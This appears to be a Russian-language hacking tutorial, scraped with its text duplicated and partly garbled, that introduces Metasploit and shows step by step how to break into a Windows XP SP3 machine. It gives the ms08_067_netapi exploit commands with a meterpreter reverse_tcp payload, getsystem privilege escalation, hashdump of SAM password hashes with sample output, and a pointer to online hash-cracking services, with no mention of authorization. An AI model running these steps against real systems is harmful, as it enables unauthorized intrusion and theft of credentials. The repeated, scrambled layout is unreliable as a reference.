Metasploit Framework – бесплатный (открытый исходный код) пен-тест framework созданный H. D. Moore в 2003 год
Metasploit обладает крупнейшими базами данных эксплоитов и принимает около миллиона загрузок каждый год.
Уязвимость (Vulnerability) – слабое место, которое позволяет злоумышленнику/пен-тестеру взламывать/скомпрометировать целевую систему. Уязвимость может существовать в операционных системах, программах, службах и т.д.
Эксплоит (Exploit) – код с помощью которого злоумышленник/пен-тестер может взломать систему, программу и т.п. Каждая уязвимость имеет свой собственный соответствующий эксплойт. Metasploit v4 имеет более чем 700 эксплоитов.
Payload – код, который выполняется после эксплоита. В основном используется для настройки связи между жертвой и атакующим. Metasploit v4 имеет более 250 payloads.
Модуль (Module) – это небольшие строительные блоки. Каждый модуль выполняет определенную задачу и система создается/строится путем объединения этих блоков в единое целое. Самым большим преимуществом такой архитектуры является то, что она легка для интеграции новых эксплоитов.
www.metasploit.com
Заинтересовались ? Или думаете что в нем интересного ?
Ну, тогда для разогрева, покажу Вам как можно взломать Windows XP SP3
Для начала обновим Metasploit:
Запускаем Metasploit:
Вводим команды:
rhost – IP-адрес удаленного пользователя (remote host)
rport – порт удаленного пользователя (remote port)
lhost – IP-адрес атакующего (local host)
lport – порт атакующего (local port)
Проверяем все ли опции заданы:
Убеждаемся, что все в порядке.
Теперь запускаем эксплоит:
Отлично! Мы в системе.
Посмотрим, какими правами мы обладаем, но скорее всего у нас будут права SYSTEM:
Server username: NT AUTHORITY/SYSTEM
Иногда бывает, что у атакующего не хватает прав на совершение какого то действия, т.е. он работает под ограниченной учетной записью. И соответственно вылетают такие ошибки, как:
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
Мы можем попробовать поднять наши права в системе командой getsystem:
...got system (via technique 1).
Server username: NT AUTHORITY/SYSTEM
Хорошо, теперь можем делать все что вздумается, но так как мы говорим про удаленный взлом пароля Windows XP, то будем придерживаться плана.
Сейчас нам нужно вывести содержимое базы данных SAM. Для этого воспользуемся командой hashdump:
Admin:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
HelpAssistant:1000:635e6894ad2400afc97d6c747dc0976a:c489103aa4919d38017486860a7e0b2d:::
Hub-lex:1004:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:2a6f7ec01c389c27cb4db76b7b0de220:::
Гость:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Чтобы расшифровать хэшы можно воспользоваться многочисленными онлайн сервисами, например cmd5.ru.
Metasploit обладает крупнейшими базами данных эксплоитов и принимает около миллиона загрузок каждый год.
Уязвимость (Vulnerability) – слабое место, которое позволяет злоумышленнику/пен-тестеру взламывать/скомпрометировать целевую систему. Уязвимость может существовать в операционных системах, программах, службах и т.д.
Эксплоит (Exploit) – код с помощью которого злоумышленник/пен-тестер может взломать систему, программу и т.п. Каждая уязвимость имеет свой собственный соответствующий эксплойт. Metasploit v4 имеет более чем 700 эксплоитов.
Payload – код, который выполняется после эксплоита. В основном используется для настройки связи между жертвой и атакующим. Metasploit v4 имеет более 250 payloads.
Модуль (Module) – это небольшие строительные блоки. Каждый модуль выполняет определенную задачу и система создается/строится путем объединения этих блоков в единое целое. Самым большим преимуществом такой архитектуры является то, что она легка для интеграции новых эксплоитов.
www.metasploit.com
Заинтересовались ? Или думаете что в нем интересного ?
Ну, тогда для разогрева, покажу Вам как можно взломать Windows XP SP3
Для начала обновим Metasploit:
Код:
# msfupdate
Код:
# msfconsole
Код:
> use windows/smb/ms08_067_netapi > set rhost 192.168.1.4 > set rport 445 > set lhost 192.168.1.5 > set lport 4444 > set payload windows/meterpreter/reverse_tcp
rport – порт удаленного пользователя (remote port)
lhost – IP-адрес атакующего (local host)
lport – порт атакующего (local port)
Проверяем все ли опции заданы:
Код:
> show options
Код:
ms08_067_netapi_show_opt_orig
Код:
> exploit ms08_067_netapi_exploit_orig
Посмотрим, какими правами мы обладаем, но скорее всего у нас будут права SYSTEM:
Код:
meterpreter > getuid
Иногда бывает, что у атакующего не хватает прав на совершение какого то действия, т.е. он работает под ограниченной учетной записью. И соответственно вылетают такие ошибки, как:
Код:
meterpreter > hashdump
Мы можем попробовать поднять наши права в системе командой getsystem:
Код:
meterpreter > getsystem
Код:
meterpreter > getuid
Хорошо, теперь можем делать все что вздумается, но так как мы говорим про удаленный взлом пароля Windows XP, то будем придерживаться плана.
Сейчас нам нужно вывести содержимое базы данных SAM. Для этого воспользуемся командой hashdump:
Код:
meterpreter > hashdump
HelpAssistant:1000:635e6894ad2400afc97d6c747dc0976a:c489103aa4919d38017486860a7e0b2d:::
Hub-lex:1004:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:2a6f7ec01c389c27cb4db76b7b0de220:::
Гость:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Код:
Синтаксис вывода такой: <User_Name>:<User_ID>:<LM Hash>:<NT Hash>:::